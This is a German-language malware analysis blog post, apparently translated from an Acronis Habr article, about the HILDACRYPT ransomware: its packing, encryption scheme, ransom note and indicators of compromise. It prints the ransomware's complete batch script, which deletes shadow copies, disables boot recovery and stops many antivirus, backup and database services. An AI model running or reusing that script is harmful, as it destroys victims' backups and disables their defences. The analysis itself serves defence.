{"id":52277,"date":"2019-11-05T00:00:00","date_gmt":"2019-11-04T21:00:00","guid":{"rendered":"https:\/\/prohoster.info\/blog\/blog_prohoster\/hildacrypt-novaya-programma-vymogatel-nanosit-udar-po-sistemam-rezervnogo-kopirovaniya-i-antivirusnym-resheniyam"},"modified":"2020-02-18T13:59:57","modified_gmt":"2020-02-18T10:59:57","slug":"hildacrypt-novaya-programma-vymogatel-nanosit-udar-po-sistemam-rezervnogo-kopirovaniya-i-antivirusnym-resheniyam","status":"publish","type":"post","link":"https:\/\/prohoster.info\/de\/blog\/administrirovanie\/hildacrypt-novaya-programma-vymogatel-nanosit-udar-po-sistemam-rezervnogo-kopirovaniya-i-antivirusnym-resheniyam","title":{"rendered":"HILDACRYPT: Ein neues Erpressungsprogramm greift Backup-Systeme und Antiviren-L\u00f6sungen an.","gt_translate_keys":[{"key":"rendered","format":"text"}]},"content":{"rendered":"<p>Hallo, Habr! Heute berichten wir erneut \u00fcber die neuesten Versionen von Malware aus der Ransomware-Kategorie. HILDACRYPT ist ein neuer Ransomware-Programm, ein Vertreter der im August 2019 entdeckten Hilda-Familie, die nach einem Animationsfilm des Streaming-Dienstes Netflix benannt wurde, der f\u00fcr die Verbreitung der Software verwendet wurde. Heute erfahren wir mehr \u00fcber die technischen Merkmale dieses aktualisierten Ransomware-Virus.<\/p>\n<p><img decoding=\"async\" alt=\"HILDACRYPT: Ein neues Erpressungsprogramm greift Backup-Systeme und Antiviren-L\u00f6sungen an.\" src=\"\/wp-content\/uploads\/2019\/11\/b42870531485dd30670e35e6a5e5125f.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<noindex><a rel=\"nofollow\" name=\"habracut\"><\/a><\/noindex><br \/>\nIn der ersten Version der Hilda-Ransomware war ein Link zu einem auf YouTube ver\u00f6ffentlichten <noindex><a rel=\"nofollow\" href=\"https:\/\/www.youtube.com\/watch?v=XCojP2Ubuto\">Trailer<\/a><\/noindex> des Animationsfilms in der L\u00f6segeldforderung enthalten. HILDACRYPT tarnt sich hingegen als legitimer Installer von XAMPP \u2013 einem einfach zu installierenden Apache-Distributionspaket, das MariaDB, PHP und Perl enth\u00e4lt. Zudem hat der Krypto-Locker einen anderen Dateinamen \u2013 xamp. Au\u00dferdem hat die Ransomware-Datei keine digitale Signatur.<\/p>\n<h3>Statische Analyse<\/h3>\n<p>\nDie Ransomware befindet sich in einer PE32 .NET-Datei, die f\u00fcr MS Windows geschrieben wurde. Ihre Gr\u00f6\u00dfe betr\u00e4gt 135.168 Bytes. Der urspr\u00fcngliche Programmcode sowie der Code des Schutzprogramms sind in C# geschrieben. Laut dem kompilierungsdatum und -zeitstempel wurde die Bin\u00e4rdatei am 14. September 2019 erstellt.<\/p>\n<p><img decoding=\"async\" alt=\"HILDACRYPT: Ein neues Erpressungsprogramm greift Backup-Systeme und Antiviren-L\u00f6sungen an.\" src=\"\/wp-content\/uploads\/2019\/11\/9b04f91f5f56ad0ff981bb2a944fa848.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<br \/>\nLaut Detect It Easy wird die Ransomware mit Confuser und ConfuserEx gepackt, wobei diese Obfuscatoren wie vorher sind; nur ist ConfuserEx der Nachfolger von Confuser, sodass die Signaturen ihres Codes \u00e4hnlich sind. <\/p>\n<p><img decoding=\"async\" alt=\"HILDACRYPT: Ein neues Erpressungsprogramm greift Backup-Systeme und Antiviren-L\u00f6sungen an.\" src=\"\/wp-content\/uploads\/2019\/11\/ce65d4db560ea7d62ef228378ab207e6.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<br \/>\nHILDACRYPT ist tats\u00e4chlich mit ConfuserEx gepackt. <\/p>\n<p><img decoding=\"async\" alt=\"HILDACRYPT: Ein neues Erpressungsprogramm greift Backup-Systeme und Antiviren-L\u00f6sungen an.\" src=\"\/wp-content\/uploads\/2019\/11\/eee308f9f6080b616c08e2f6709245d8.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<br \/>\nSHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a<\/p>\n<h3>Angriffsvektor<\/h3>\n<p>\nWahrscheinlich wurde die Ransomware auf einer der Webseiten zum Webprogrammieren entdeckt und versteckt sich unter einem legitimen Programm wie XAMPP.<\/p>\n<p>Die gesamte Infektionskette kann man in <noindex><a rel=\"nofollow\" href=\"https:\/\/app.any.run\/tasks\/abe20240-2f3c-40cf-b5dd-4f0088ab1c5a\/\">app.any.run sandbox<\/a><\/noindex>.<\/p>\n<h3>Obfuskation <\/h3>\n<p>\nDie Strings der Ransomware werden verschl\u00fcsselt gespeichert. Beim Start entschl\u00fcsselt HILDACRYPT sie mit Base64 und AES-256-CBC.<\/p>\n<p><img decoding=\"async\" alt=\"HILDACRYPT: Ein neues Erpressungsprogramm greift Backup-Systeme und Antiviren-L\u00f6sungen an.\" src=\"\/wp-content\/uploads\/2019\/11\/9e2a478ba19480308dcff887c2353e18.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<\/p>\n<h3>Installation von<\/h3>\n<p>\nZun\u00e4chst erstellt die Ransomware unter %AppDataRoaming% einen Ordner, dessen GUID (Globally Unique Identifier) zuf\u00e4llig generiert wird. Indem sie eine Batch-Datei in dieses Verzeichnis hinzuf\u00fcgt, startet die Ransomware sie mit cmd.exe:<\/p>\n<p><i>cmd.exe \/c  JKfgkgj3hjgfhjka.bat  &amp; exit<br \/>\n<\/i><br \/>\n<img decoding=\"async\" alt=\"HILDACRYPT: Ein neues Erpressungsprogramm greift Backup-Systeme und Antiviren-L\u00f6sungen an.\" src=\"\/wp-content\/uploads\/2019\/11\/5319151b3f57af2394e6031f4cd1bcd6.jpg\" style=\"display:block;margin: 0 auto;\" \/><img decoding=\"async\" alt=\"HILDACRYPT: Ein neues Erpressungsprogramm greift Backup-Systeme und Antiviren-L\u00f6sungen an.\" src=\"\/wp-content\/uploads\/2019\/11\/c0c749619f3f9a240e362f5effb5ea2e.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\nAnschlie\u00dfend beginnt sie mit der Ausf\u00fchrung des Batch-Skripts, umSystemfunktionen oder -dienste zu deaktivieren.<\/p>\n<p><img decoding=\"async\" alt=\"HILDACRYPT: Ein neues Erpressungsprogramm greift Backup-Systeme und Antiviren-L\u00f6sungen an.\" src=\"\/wp-content\/uploads\/2019\/11\/ecea9735d151835ddeeb62986b325399.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<br \/>\nDas Skript enth\u00e4lt eine lange Liste von Befehlen, mit denen Schattenkopien gel\u00f6scht, der SQL-Server deaktiviert, sowie Backup- und Antivirenl\u00f6sungen gestoppt werden.<\/p>\n<p>Es versucht beispielsweise erfolglos, die Backup-Dienste von Acronis Backup zu stoppen. Dar\u00fcber hinaus greift es die Backup- und Antivirenl\u00f6sungen folgender Anbieter an: Veeam, Sophos, Kaspersky, McAfee und weitere.<\/p>\n<pre><code class=\"plaintext\">@echo off\n:: Not really a fan of ponies, cartoon girls are better, don't you think?\nvssadmin resize shadowstorage \/for=c: \/on=c: \/maxsize=401MB\nvssadmin resize shadowstorage \/for=c: \/on=c: \/maxsize=unbounded\nvssadmin resize shadowstorage \/for=d: \/on=d: \/maxsize=401MB\nvssadmin resize shadowstorage \/for=d: \/on=d: \/maxsize=unbounded\nvssadmin resize shadowstorage \/for=e: \/on=e: \/maxsize=401MB\nvssadmin resize shadowstorage \/for=e: \/on=e: \/maxsize=unbounded\nvssadmin resize shadowstorage \/for=f: \/on=f: \/maxsize=401MB\nvssadmin resize shadowstorage \/for=f: \/on=f: \/maxsize=unbounded\nvssadmin resize shadowstorage \/for=g: \/on=g: \/maxsize=401MB\nvssadmin resize shadowstorage \/for=g: \/on=g: \/maxsize=unbounded\nvssadmin resize shadowstorage \/for=h: \/on=h: \/maxsize=401MB\nvssadmin resize shadowstorage \/for=h: \/on=h: \/maxsize=unbounded\nbcdedit \/set {default} recoveryenabled No\nbcdedit \/set {default} bootstatuspolicy ignoreallfailures\nvssadmin Delete Shadows \/all \/quiet\nnet stop SQLAgent$SYSTEM_BGC \/y\nnet stop \u201cSophos Device Control Service\u201d \/y\nnet stop macmnsvc \/y\nnet stop SQLAgent$ECWDB2 \/y\nnet stop \u201cZoolz 2 Service\u201d \/y\nnet stop McTaskManager \/y\nnet stop \u201cSophos AutoUpdate Service\u201d \/y\nnet stop \u201cSophos System Protection Service\u201d \/y\nnet stop EraserSvc11710 \/y\nnet stop PDVFSService \/y\nnet stop SQLAgent$PROFXENGAGEMENT \/y\nnet stop SAVService \/y\nnet stop MSSQLFDLauncher$TPSAMA \/y\nnet stop EPSecurityService \/y\nnet stop SQLAgent$SOPHOS \/y\nnet stop \u201cSymantec System Recovery\u201d \/y\nnet stop Antivirus \/y\nnet stop SstpSvc \/y\nnet stop MSOLAP$SQL_2008 \/y\nnet stop TrueKeyServiceHelper \/y\nnet stop sacsvr \/y\nnet stop VeeamNFSSvc \/y\nnet stop FA_Scheduler \/y\nnet stop SAVAdminService \/y\nnet stop EPUpdateService \/y\nnet stop VeeamTransportSvc \/y\nnet stop \u201cSophos Health Service\u201d \/y\nnet stop bedbg \/y\nnet stop MSSQLSERVER \/y\nnet stop KAVFS \/y\nnet stop Smcinst \/y\nnet stop MSSQLServerADHelper100 \/y\nnet stop TmCCSF \/y\nnet stop wbengine \/y\nnet stop SQLWriter \/y\nnet stop MSSQLFDLauncher$TPS \/y\nnet stop SmcService \/y\nnet stop ReportServer$TPSAMA \/y\nnet stop swi_update \/y\nnet stop AcrSch2Svc \/y\nnet stop MSSQL$SYSTEM_BGC \/y\nnet stop VeeamBrokerSvc \/y\nnet stop MSSQLFDLauncher$PROFXENGAGEMENT \/y\nnet stop VeeamDeploymentService \/y\nnet stop SQLAgent$TPS \/y\nnet stop DCAgent \/y\nnet stop \u201cSophos Message Router\u201d \/y\nnet stop MSSQLFDLauncher$SBSMONITORING \/y\nnet stop wbengine \/y\nnet stop MySQL80 \/y\nnet stop MSOLAP$SYSTEM_BGC \/y\nnet stop ReportServer$TPS \/y\nnet stop MSSQL$ECWDB2 \/y\nnet stop SntpService \/y\nnet stop SQLSERVERAGENT \/y\nnet stop BackupExecManagementService \/y\nnet stop SMTPSvc \/y\nnet stop mfefire \/y\nnet stop BackupExecRPCService \/y\nnet stop MSSQL$VEEAMSQL2008R2 \/y\nnet stop klnagent \/y\nnet stop MSExchangeSA \/y\nnet stop MSSQLServerADHelper \/y\nnet stop SQLTELEMETRY \/y\nnet stop \u201cSophos Clean Service\u201d \/y\nnet stop swi_update_64 \/y\nnet stop \u201cSophos Web Control Service\u201d \/y\nnet stop EhttpSrv \/y\nnet stop POP3Svc \/y\nnet stop MSOLAP$TPSAMA \/y\nnet stop McAfeeEngineService \/y\nnet stop \u201cVeeam Backup Catalog Data Service\u201d \/\nnet stop MSSQL$SBSMONITORING \/y\nnet stop ReportServer$SYSTEM_BGC \/y\nnet stop AcronisAgent \/y\nnet stop KAVFSGT \/y\nnet stop BackupExecDeviceMediaService \/y\nnet stop MySQL57 \/y\nnet stop McAfeeFrameworkMcAfeeFramework \/y\nnet stop TrueKey \/y\nnet stop VeeamMountSvc \/y\nnet stop MsDtsServer110 \/y\nnet stop SQLAgent$BKUPEXEC \/y\nnet stop UI0Detect \/y\nnet stop ReportServer \/y\nnet stop SQLTELEMETRY$ECWDB2 \/y\nnet stop MSSQLFDLauncher$SYSTEM_BGC \/y\nnet stop MSSQL$BKUPEXEC \/y\nnet stop SQLAgent$PRACTTICEBGC \/y\nnet stop MSExchangeSRS \/y\nnet stop SQLAgent$VEEAMSQL2008R2 \/y\nnet stop McShield \/y\nnet stop SepMasterService \/y\nnet stop \u201cSophos MCS Client\u201d \/y\nnet stop VeeamCatalogSvc \/y\nnet stop SQLAgent$SHAREPOINT \/y\nnet stop NetMsmqActivator \/y\nnet stop kavfsslp \/y\nnet stop tmlisten \/y\nnet stop ShMonitor \/y\nnet stop MsDtsServer \/y\nnet stop SQLAgent$SQL_2008 \/y\nnet stop SDRSVC \/y\nnet stop IISAdmin \/y\nnet stop SQLAgent$PRACTTICEMGT \/y\nnet stop BackupExecJobEngine \/y\nnet stop SQLAgent$VEEAMSQL2008R2 \/y\nnet stop BackupExecAgentBrowser \/y\nnet stop VeeamHvIntegrationSvc \/y\nnet stop masvc \/y\nnet stop W3Svc \/y\nnet stop \u201cSQLsafe Backup Service\u201d \/y\nnet stop SQLAgent$CXDB \/y\nnet stop SQLBrowser \/y\nnet stop MSSQLFDLauncher$SQL_2008 \/y\nnet stop VeeamBackupSvc \/y\nnet stop \u201cSophos Safestore Service\u201d \/y\nnet stop svcGenericHost \/y\nnet stop ntrtscan \/y\nnet stop SQLAgent$VEEAMSQL2012 \/y\nnet stop MSExchangeMGMT \/y\nnet stop SamSs \/y\nnet stop MSExchangeES \/y\nnet stop MBAMService \/y\nnet stop EsgShKernel \/y\nnet stop ESHASRV \/y\nnet stop MSSQL$TPSAMA \/y\nnet stop SQLAgent$CITRIX_METAFRAME \/y\nnet stop VeeamCloudSvc \/y\nnet stop \u201cSophos File Scanner Service\u201d \/y\nnet stop \u201cSophos Agent\u201d \/y\nnet stop MBEndpointAgent \/y\nnet stop swi_service \/y\nnet stop MSSQL$PRACTICEMGT \/y\nnet stop SQLAgent$TPSAMA \/y\nnet stop McAfeeFramework \/y\nnet stop \u201cEnterprise Client Service\u201d \/y\nnet stop SQLAgent$SBSMONITORING \/y\nnet stop MSSQL$VEEAMSQL2012 \/y\nnet stop swi_filter \/y\nnet stop SQLSafeOLRService \/y\nnet stop BackupExecVSSProvider \/y\nnet stop VeeamEnterpriseManagerSvc \/y\nnet stop SQLAgent$SQLEXPRESS \/y\nnet stop OracleClientCache80 \/y\nnet stop MSSQL$PROFXENGAGEMENT \/y\nnet stop IMAP4Svc \/y\nnet stop ARSM \/y\nnet stop MSExchangeIS \/y\nnet stop AVP \/y\nnet stop MSSQLFDLauncher \/y\nnet stop MSExchangeMTA \/y\nnet stop TrueKeyScheduler \/y\nnet stop MSSQL$SOPHOS \/y\nnet stop \u201cSQL Backups\u201d \/y\nnet stop MSSQL$TPS \/y\nnet stop mfemms \/y\nnet stop MsDtsServer100 \/y\nnet stop MSSQL$SHAREPOINT \/y\nnet stop WRSVC \/y\nnet stop mfevtp \/y\nnet stop msftesql$PROD \/y\nnet stop mozyprobackup \/y\nnet stop MSSQL$SQL_2008 \/y\nnet stop SNAC \/y\nnet stop ReportServer$SQL_2008 \/y\nnet stop BackupExecAgentAccelerator \/y\nnet stop MSSQL$SQLEXPRESS \/y\nnet stop MSSQL$PRACTTICEBGC \/y\nnet stop VeeamRESTSvc \/y\nnet stop sophossps \/y\nnet stop ekrn \/y\nnet stop MMS \/y\nnet stop \u201cSophos MCS Agent\u201d \/y\nnet stop RESvc \/y\nnet stop \u201cAcronis VSS Provider\u201d \/y\nnet stop MSSQL$VEEAMSQL2008R2 \/y\nnet stop MSSQLFDLauncher$SHAREPOINT \/y\nnet stop \u201cSQLsafe Filter Service\u201d \/y\nnet stop MSSQL$PROD \/y\nnet stop SQLAgent$PROD \/y\nnet stop MSOLAP$TPS \/y\nnet stop VeeamDeploySvc \/y\nnet stop MSSQLServerOLAPService \/y\ndel %0\n<\/code><\/pre>\n<p>\nNachdem die oben genannten Dienste und Prozesse deaktiviert wurden, sammelt der Krypto-Locker Informationen \u00fcber alle laufenden Prozesse mithilfe des Befehls tasklist, um sicherzustellen, dass alle ben\u00f6tigten Dienste nicht aktiv sind. <br \/>\n<i>tasklist v \/fo csv<\/i><\/p>\n<p>Dieser Befehl gibt eine detaillierte Liste der laufenden Prozesse aus, deren Elemente durch ein \u00ab,\u00bb getrennt sind. <br \/>\n<i>&#171;\u00abcsrss.exe\u00bb,\u00ab448\u00bb,\u00abservices\u00bb,\u00ab0\u00bb,\u00ab1\ufffd896 \ufffd\ufffd\u00bb,\u00abunknown\u00bb,&#187;\ufffd\/\ufffd&#187;,\u00ab0:00:03\u00bb,&#187;\ufffd\/\ufffd&#187;&#187;<br \/>\n<\/i><\/p>\n<p><img decoding=\"async\" alt=\"HILDACRYPT: Ein neues Erpressungsprogramm greift Backup-Systeme und Antiviren-L\u00f6sungen an.\" src=\"\/wp-content\/uploads\/2019\/11\/b16a8f52dba47ace2ca99d120f4f9b01.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<br \/>\nNach dieser \u00dcberpr\u00fcfung beginnt das Ransomware-Programm mit dem Verschl\u00fcsselungsprozess. <\/p>\n<h3>Verschl\u00fcsselung <br \/>\n<\/h3>\n<h4>Dateiverschl\u00fcsselung<\/h4>\n<p>\nHILDACRYPT durchsucht alle gefundenen Inhalte der Festplatten, mit Ausnahme der Ordner Recycle.Bin und Reference AssembliesMicrosoft. Letzterer enth\u00e4lt kritische Dateien wie dll, pdb usw. f\u00fcr .Net-Anwendungen, die die Funktionsweise des Ransomware-Programms beeintr\u00e4chtigen k\u00f6nnen. F\u00fcr die Suche nach Dateien, die verschl\u00fcsselt werden sollen, wird die folgende Liste von Dateierweiterungen verwendet:<\/p>\n<p><i>&#171;.vb:.asmx:.config:.3dm:.3ds:.3fr:.3g2:.3gp:.3pr:.7z:.ab4:.accdb:.accde:.accdr:.accdt:.ach:.acr:.act:.adb:.ads:.agdl:.ai:.ait:.al:.apj:.arw:.asf:.asm:.asp:.aspx:.asx:.avi:.awg:.back:.backup:.backupdb:.bak:.lua:.m:.m4v:.max:.mdb:.mdc:.mdf:.mef:.mfw:.mmw:.moneywell:.mos:.mov:.mp3:.mp4:.mpg:.mpeg:.mrw:.msg:.myd:.nd:.ndd:.nef:.nk2:.nop:.nrw:.ns2:.ns3:.ns4:.nsd:.nsf:.nsg:.nsh:.nwb:.nx2:.nxl:.nyf:.tif:.tlg:.txt:.vob:.wallet:.war:.wav:.wb2:.wmv:.wpd:.wps:.x11:.x3f:.xis:.xla:.xlam:.xlk:.xlm:.xlr:.xls:.xlsb:.xlsm:.xlsx:.xlt:.xltm:.xltx:.xlw:.xml:.ycbcra:.yuv:.zip:.sqlite:.sqlite3:.sqlitedb:.sr2:.srf:.srt:.srw:.st4:.st5:.st6:.st7:.st8:.std:.sti:.stw:.stx:.svg:.swf:.sxc:.sxd:.sxg:.sxi:.sxm:.sxw:.tex:.tga:.thm:.tib:.py:.qba:.qbb:.qbm:.qbr:.qbw:.qbx:.qby:.r3d:.raf:.rar:.rat:.raw:.rdb:.rm:.rtf:.rw2:.rwl:.rwz:.s3db:.sas7bdat:.say:.sd0:.sda:.sdf:.sldm:.sldx:.sql:.pdd:.pdf:.pef:.pem:.pfx:.php:.php5:.phtml:.pl:.plc:.png:.pot:.potm:.potx:.ppam:.pps:.ppsm:.ppsx:.ppt:.pptm:.pptx:.prf:.ps:.psafe3:.psd:.pspimage:.pst:.ptx:.oab:.obj:.odb:.odc:.odf:.odg:.odm:.odp:.ods:.odt:.oil:.orf:.ost:.otg:.oth:.otp:.ots:.ott:.p12:.p7b:.p7c:.pab:.pages:.pas:.pat:.pbl:.pcd:.pct:.pdb:.gray:.grey:.gry:.h:.hbk:.hpp:.htm:.html:.ibank:.ibd:.ibz:.idx:.iif:.iiq:.incpas:.indd:.jar:.java:.jpe:.jpeg:.jpg:.jsp:.kbx:.kc2:.kdbx:.kdc:.key:.kpdx:.doc:.docm:.docx:.dot:.dotm:.dotx:.drf:.drw:.dtd:.dwg:.dxb:.dxf:.dxg:.eml:.eps:.erbsql:.erf:.exf:.fdb:.ffd:.fff:.fh:.fhd:.fla:.flac:.flv:.fmb:.fpx:.fxg:.cpp:.cr2:.craw:.crt:.crw:.cs:.csh:.csl:.csv:.dac:.bank:.bay:.bdb:.bgt:.bik:.bkf:.bkp:.blend:.bpw:.c:.cdf:.cdr:.cdr3:.cdr4:.cdr5:.cdr6:.cdrw:.cdx:.ce1:.ce2:.cer:.cfp:.cgm:.cib:.class:.cls:.cmt:.cpi:.ddoc:.ddrw:.dds:.der:.des:.design:.dgc:.djvu:.dng:.db:.db-journal:.db3:.dcr:.dcs:.ddd:.dbf:.dbx:.dc2:.pbl:.csproj:.sln:.vbproj:.mdb:.md&#187;<br \/>\n<\/i><br \/>\nF\u00fcr die Verschl\u00fcsselung der Benutzerdaten verwendet die Ransomware den AES-256-CBC Algorithmus. Die Schl\u00fcsselgr\u00f6\u00dfe betr\u00e4gt 256 Bit, und die Initialisierungsvektorgr\u00f6\u00dfe (IV) liegt bei 16 Byte. <\/p>\n<p><img decoding=\"async\" alt=\"HILDACRYPT: Ein neues Erpressungsprogramm greift Backup-Systeme und Antiviren-L\u00f6sungen an.\" src=\"\/wp-content\/uploads\/2019\/11\/7c1a57562a3f8ada074639fbab35429d.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<br \/>\nIm folgenden Screenshot wurden die Werte byte_2 und byte_1 zuf\u00e4llig mit GetBytes() generiert. <\/p>\n<p><img decoding=\"async\" alt=\"HILDACRYPT: Ein neues Erpressungsprogramm greift Backup-Systeme und Antiviren-L\u00f6sungen an.\" src=\"\/wp-content\/uploads\/2019\/11\/fcd506b4ebf6ccb056b69ccc7249641a.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<br \/>\nDer Schl\u00fcssel<\/p>\n<p><img decoding=\"async\" alt=\"HILDACRYPT: Ein neues Erpressungsprogramm greift Backup-Systeme und Antiviren-L\u00f6sungen an.\" src=\"\/wp-content\/uploads\/2019\/11\/9af5398ae995176297743fbd94054d6d.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<br \/>\nVI<\/p>\n<p><img decoding=\"async\" alt=\"HILDACRYPT: Ein neues Erpressungsprogramm greift Backup-Systeme und Antiviren-L\u00f6sungen an.\" src=\"\/wp-content\/uploads\/2019\/11\/e6626bce140fdfca6bb989602b959786.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<br \/>\nDie verschl\u00fcsselte Datei hat die Endung HCY!.. Dies ist ein Beispiel f\u00fcr eine verschl\u00fcsselte Datei. F\u00fcr diese Datei wurden der oben genannte Schl\u00fcssel und IV erstellt. <\/p>\n<p><img decoding=\"async\" alt=\"HILDACRYPT: Ein neues Erpressungsprogramm greift Backup-Systeme und Antiviren-L\u00f6sungen an.\" src=\"\/wp-content\/uploads\/2019\/11\/f6d659bfe8a8217457e06fed916a4f2d.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<\/p>\n<h4>Verschl\u00fcsselung der Schl\u00fcssel<\/h4>\n<p>\nDer Kryptolocker speichert den generierten AES-Schl\u00fcssel in der verschl\u00fcsselten Datei. Der erste Teil der verschl\u00fcsselten Datei enth\u00e4lt einen Header, der Informationen wie HILDACRYPT, KEY, IV, FileLen im XML-Format enth\u00e4lt und wie folgt aussieht:<\/p>\n<p><img decoding=\"async\" alt=\"HILDACRYPT: Ein neues Erpressungsprogramm greift Backup-Systeme und Antiviren-L\u00f6sungen an.\" src=\"\/wp-content\/uploads\/2019\/11\/e0d887d87b06346da88104c2d60940b8.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<br \/>\nDie Verschl\u00fcsselung des AES-Schl\u00fcssels und des IV erfolgt mithilfe von RSA-2048, w\u00e4hrend die Kodierung mit Base64 erfolgt. Der RSA- \u00f6ffentliche Schl\u00fcssel wird im K\u00f6rper des Kryptolockers in einer der verschl\u00fcsselten Zeilen im XML-Format gespeichert.<\/p>\n<p><code>28guEbzkzciKg3N\/ExUq8jGcshuMSCmoFsh\/3LoMyWzPrnfHGhrgotuY\/cs+eSGABQ+rs1B+MMWOWvqWdVpBxUgzgsgOgcJt7P+r4bWhfccYeKDi7PGRtZuTv+XpmG+m+u\/JgerBM1Fi49+0vUMuEw5a1sZ408CvFapojDkMT0P5cJGYLSiVFud8reV7ZtwcCaGf88rt8DAUt2iSZQix0aw8PpnCH5\/74WE8dAHKLF3sYmR7yFWAdCJRovzdx8\/qfjMtZ41sIIIEyajVKfA18OT72\/UBME2gsAM\/BGii2hgLXP5ZGKPgQEf7Zpic1fReZcpJonhNZzXztGCSLfa\/jQ==AQAB<br \/>\n<\/code><\/p>\n<p>F\u00fcr die Verschl\u00fcsselung des AES-Dateischl\u00fcssels wird der RSA-\u00f6ffentliche Schl\u00fcssel verwendet. Der RSA-\u00f6ffentliche Schl\u00fcssel ist in Base64 kodiert und besteht aus dem Modul und der \u00f6ffentlichen Exponenten 65537. Zum Entschl\u00fcsseln wird der private RSA-Schl\u00fcssel ben\u00f6tigt, der dem Angreifer geh\u00f6rt.<\/p>\n<p>Nach der RSA-Verschl\u00fcsselung wird der AES-Schl\u00fcssel mit Base64 codiert und in der verschl\u00fcsselten Datei gespeichert.<\/p>\n<h3>L\u00f6segeldnachricht<\/h3>\n<p>\nNach Abschluss der Verschl\u00fcsselung speichert HILDACRYPT eine HTML-Datei in dem Ordner, in dem die Dateien verschl\u00fcsselt wurden. Die Mitteilung der Ransomware enth\u00e4lt zwei E-Mail-Adressen, \u00fcber die das Opfer den Angreifer kontaktieren kann.<\/p>\n<ul>\n<li><i>hildalolilovesyou@airmail.cc<\/i><br \/>\n hildalolilovesyou@memeware.net\n<\/li>\n<\/ul>\n<p>\n<img decoding=\"async\" alt=\"HILDACRYPT: Ein neues Erpressungsprogramm greift Backup-Systeme und Antiviren-L\u00f6sungen an.\" src=\"\/wp-content\/uploads\/2019\/11\/9996e9a6741ac3b8c423374c83924a91.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<br \/>\nDie Ransomware-Warnung enth\u00e4lt auch die Zeile \u201eNo loli is safe;)\u201c \u2013 \u201eKeine Loli ist sicher;)\u201c, eine Anspielung auf in Japan verbotene Anime- und Manga-Charaktere mit dem Aussehen kleiner M\u00e4dchen.<\/p>\n<h3>Fazit<\/h3>\n<p>\nHILDACRYPT, eine neue Familie von Ransomware, hat eine neue Version ver\u00f6ffentlicht. Das Verschl\u00fcsselungsmodell l\u00e4sst den Opfern keine M\u00f6glichkeit, die von der Ransomware verschl\u00fcsselten Dateien zu entschl\u00fcsseln. Der Krypto-Locker verwendet aktive Schutzmethoden, um Sicherheitsdienste zu deaktivieren, die mit Backup-Systemen und Antivirenl\u00f6sungen verbunden sind. Der Autor von HILDACRYPT ist ein Fan der auf Netflix gezeigten Animationsserie Hilda, der Link zum Trailer war in der L\u00f6segeldmitteilung der vorherigen Version enthalten. <\/p>\n<p>Wie \u00fcblich, <noindex><a rel=\"nofollow\" href=\"https:\/\/www.acronis.com\/en-us\/business\/backup\/\">Acronis Backup<\/a><\/noindex> und <noindex><a rel=\"nofollow\" href=\"https:\/\/www.acronis.com\/en-us\/personal\/computer-backup\/\">Acronis True Image<\/a><\/noindex> kann Ihren Computer vor der Ransomware HILDACRYPT sch\u00fctzen, w\u00e4hrend Anbieter die M\u00f6glichkeit haben, ihre Kunden mit Hilfe von <noindex><a rel=\"nofollow\" href=\"https:\/\/www.acronis.com\/en-us\/cloud\/service-provider\/backup\/\">Acronis Backup Cloud<\/a><\/noindex>. Der Schutz wird dadurch gew\u00e4hrleistet, dass diese L\u00f6sungen <noindex><a rel=\"nofollow\" href=\"https:\/\/www.acronis.com\/en-us\/cyber-protection\/\">Cybersicherheit<\/a><\/noindex> nicht nur Backups umfassen, sondern auch unser integriertes Schutzsystem <noindex><a rel=\"nofollow\" href=\"https:\/\/www.acronis.com\/en-us\/ransomware-protection\/\">Acronis Active Protection<\/a><\/noindex> \u2014 ein verst\u00e4rktes, auf maschinellem Lernen basierendes und auf verhaltensorientierten Heuristiken beruhendes Verfahren, das wie kein anderes in der Lage ist, den Bedrohungen von Zero-Day-Ransomware entgegenzuwirken.<\/p>\n<h3>Indicators of Compromise<\/h3>\n<p>\nDie Dateierweiterung HCY!<br \/>\nHILDACRYPTReadMe.html<br \/>\nxamp.exe mit einem \u201ep\u201c und ohne digitale Signatur<br \/>\nSHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a<br \/>\n<br \/>Quelle: <a content=\"nofollow\" rel=\"nofollow\" href=\"https:\/\/habr.com\/ru\/company\/acronis\/blog\/474048\/\">habr.com<\/a><\/p>","protected":false,"gt_translate_keys":[{"key":"rendered","format":"html"}]},"excerpt":{"rendered":"<p>\u041f\u0440\u0438\u0432\u0435\u0442, \u0425\u0430\u0431\u0440! \u0418 \u0441\u043d\u043e\u0432\u0430 \u043c\u044b \u0440\u0430\u0441\u0441\u043a\u0430\u0437\u044b\u0432\u0430\u0435\u043c \u043e \u0441\u0432\u0435\u0436\u0438\u0445 \u0432\u0435\u0440\u0441\u0438\u044f\u0445 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u041f\u041e \u0438\u0437 \u043a\u0430\u0442\u0435\u0433\u043e\u0440\u0438\u0438 Ransomware. HILDACRYPT \u2014 \u044d\u0442\u043e \u043d\u043e\u0432\u0430\u044f \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u0430-\u0432\u044b\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u044c, \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u0438\u0442\u0435\u043b\u044c \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u043e\u0433\u043e \u0432 \u0430\u0432\u0433\u0443\u0441\u0442\u0435 2019 \u0433\u043e\u0434\u0430 \u0441\u0435\u043c\u0435\u0439\u0441\u0442\u0432\u0430 Hilda, \u043d\u0430\u0437\u0432\u0430\u043d\u043d\u043e\u0433\u043e \u0432 \u0447\u0435\u0441\u0442\u044c \u043c\u0443\u043b\u044c\u0442\u0444\u0438\u043b\u044c\u043c\u0430 